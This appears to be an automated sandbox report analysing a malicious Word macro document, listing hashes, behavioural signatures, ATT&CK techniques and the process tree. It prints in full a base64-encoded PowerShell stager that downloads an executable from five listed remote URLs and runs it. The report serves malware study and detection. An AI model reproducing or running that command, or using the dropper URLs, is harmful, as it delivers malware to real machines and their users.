132b80a7e447dfd6893270baa35d4a97fdccf1bf7306fe94f81233d1ea15bc9b

General

Target

132b80a7e447dfd6893270baa35d4a97fdccf1bf7306fe94f81233d1ea15bc9b.doc
Size

148KB
MD5

ac311f203eee100fdf576e5b5510b761
SHA1

560fd00010580f37b799d559fa7b8b5874101134
SHA256

132b80a7e447dfd6893270baa35d4a97fdccf1bf7306fe94f81233d1ea15bc9b
SHA512

507ecdc21e524ef02b72bfadd42c6a5d452fa7a0b124812a6057184b0f0a6d8c4a28861e926582dc34842de56c0d04f2fe628dfad04aa865369a4537d3526fa5

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.wholesale-towels.com/caapa/2skq2c8brl_ujstqor-9423/

exe.dropper

https://sehatmadu.com/wp-admin/sMsnqVEHO/

exe.dropper

http://wayuansudamai.com/wp-includes/tUhChhCpcN/

exe.dropper

http://vnilla.com/cgi-bin/xdmlv_90ij5qu1-86492/

exe.dropper

http://vcontenidos.com/wp-admin/nzxnfyy9_x7u5tyux4w-71288/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4816	4696	powershell.exe	42

Blocklisted process makes network request 5 IoCs

flow	pid	Process
34	4816	powershell.exe
46	4816	powershell.exe
51	4816	powershell.exe
54	4816	powershell.exe
56	4816	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3080	WINWORD.EXE
3080	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4816	powershell.exe
4816	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4816	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3080	WINWORD.EXE
3080	WINWORD.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3080	WINWORD.EXE
3080	WINWORD.EXE
3080	WINWORD.EXE
3080	WINWORD.EXE
3080	WINWORD.EXE
3080	WINWORD.EXE
3080	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 3080 wrote to memory of 3484	3080	WINWORD.EXE	87
PID 3080 wrote to memory of 3484	3080	WINWORD.EXE	87

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\132b80a7e447dfd6893270baa35d4a97fdccf1bf7306fe94f81233d1ea15bc9b.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3080
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:3484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -e JABpADkASQA5AGwATQBJAD0AJwB2ADQANgBIAFcAcwA1ACcAOwAkAHoAOQBLADAAUwBNACAAPQAgACcAOQA4ADUAJwA7ACQATQB1AHoAdAA4AFUAaQA9ACcAegBBAHIAVgBrAGYAJwA7ACQAVQA0AEkASwA1AEQAdABVAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB6ADkASwAwAFMATQArACcALgBlAHgAZQAnADsAJABpAGIAUwA4AEIAMABuAD0AJwBGAEkAbABQAFIAXwBFACcAOwAkAGMARgBBAFMAcwBZAEgAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4ARQB0AC4AYABXAGUAQgBgAEMATABpAGAAZQBOAFQAOwAkAGoAMgBjAFEAVwB6AEMAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHcAaABvAGwAZQBzAGEAbABlAC0AdABvAHcAZQBsAHMALgBjAG8AbQAvAGMAYQBhAHAAYQAvADIAcwBrAHEAMgBjADgAYgByAGwAXwB1AGoAcwB0AHEAbwByAC0AOQA0ADIAMwAvAEAAaAB0AHQAcABzADoALwAvAHMAZQBoAGEAdABtAGEAZAB1AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBzAE0AcwBuAHEAVgBFAEgATwAvAEAAaAB0AHQAcAA6AC8ALwB3AGEAeQB1AGEAbgBzAHUAZABhAG0AYQBpAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB0AFUAaABDAGgAaABDAHAAYwBOAC8AQABoAHQAdABwADoALwAvAHYAbgBpAGwAbABhAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AeABkAG0AbAB2AF8AOQAwAGkAagA1AHEAdQAxAC0AOAA2ADQAOQAyAC8AQABoAHQAdABwADoALwAvAHYAYwBvAG4AdABlAG4AaQBkAG8AcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgB6AHgAbgBmAHkAeQA5AF8AeAA3AHUANQB0AHkAdQB4ADQAdwAtADcAMQAyADgAOAAvACcALgBzAFAAbABJAHQAKAAnAEAAJwApADsAJABsAHcATwBNAG8AQwBHAEYAPQAnAEwAaABWAG0AUwBFAE8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAHoAXwBpAG8AOQBwACAAaQBuACAAJABqADIAYwBRAFcAegBDACkAewB0AHIAeQB7ACQAYwBGAEEAUwBzAFkASAAuAEQATwBXAG4AbABPAGEAZABmAGkAbABlACgAJAB6AF8AaQBvADkAcAAsACAAJABVADQASQBLADUARAB0AFUAKQA7ACQAWQBOAHYASwA2AGkATwBhAD0AJwBsAEEAbgBqAHcAegBRAFoAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABVADQASQBLADUARAB0AFUAKQAuAEwAZQBOAGcAVABIACAALQBnAGUAIAAyADkANQAxADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAFIAVAAoACQAVQA0AEkASwA1AEQAdABVACkAOwAkAHIAOABEAE0AbQA3AD0AJwBQAEwARABiAEgAUwBrACcAOwBiAHIAZQBhAGsAOwAkAFEAdABhAG4AbQBSAE0APQAnAHcAagAxAEIAcAB2AHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATwBzADAAUwBpAGMANAA9ACcAaQBqAGoAUQBMAHoAbgAnAA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3080-138-0x0000027820E10000-0x0000027820E14000-memory.dmp

Filesize
16KB

Download
memory/3080-136-0x00007FF9050D0000-0x00007FF9050E0000-memory.dmp

Filesize
64KB

Download
memory/3080-132-0x00007FF9074D0000-0x00007FF9074E0000-memory.dmp

Filesize
64KB

Download
memory/3080-133-0x00007FF9074D0000-0x00007FF9074E0000-memory.dmp

Filesize
64KB

Download
memory/3080-130-0x00007FF9074D0000-0x00007FF9074E0000-memory.dmp

Filesize
64KB

Download
memory/3080-135-0x00007FF9050D0000-0x00007FF9050E0000-memory.dmp

Filesize
64KB

Download
memory/3080-131-0x00007FF9074D0000-0x00007FF9074E0000-memory.dmp

Filesize
64KB

Download
memory/3080-146-0x00007FF9074D0000-0x00007FF9074E0000-memory.dmp

Filesize
64KB

Download
memory/3080-134-0x00007FF9074D0000-0x00007FF9074E0000-memory.dmp

Filesize
64KB

Download
memory/3080-145-0x00007FF9074D0000-0x00007FF9074E0000-memory.dmp

Filesize
64KB

Download
memory/3080-144-0x00007FF9074D0000-0x00007FF9074E0000-memory.dmp

Filesize
64KB

Download
memory/3080-143-0x00007FF9074D0000-0x00007FF9074E0000-memory.dmp

Filesize
64KB

Download
memory/4816-141-0x00007FF91AB80000-0x00007FF91B641000-memory.dmp

Filesize
10.8MB

Download
memory/4816-140-0x00007FF91AB80000-0x00007FF91B641000-memory.dmp

Filesize
10.8MB

Download
memory/4816-139-0x0000021428C60000-0x0000021428C82000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads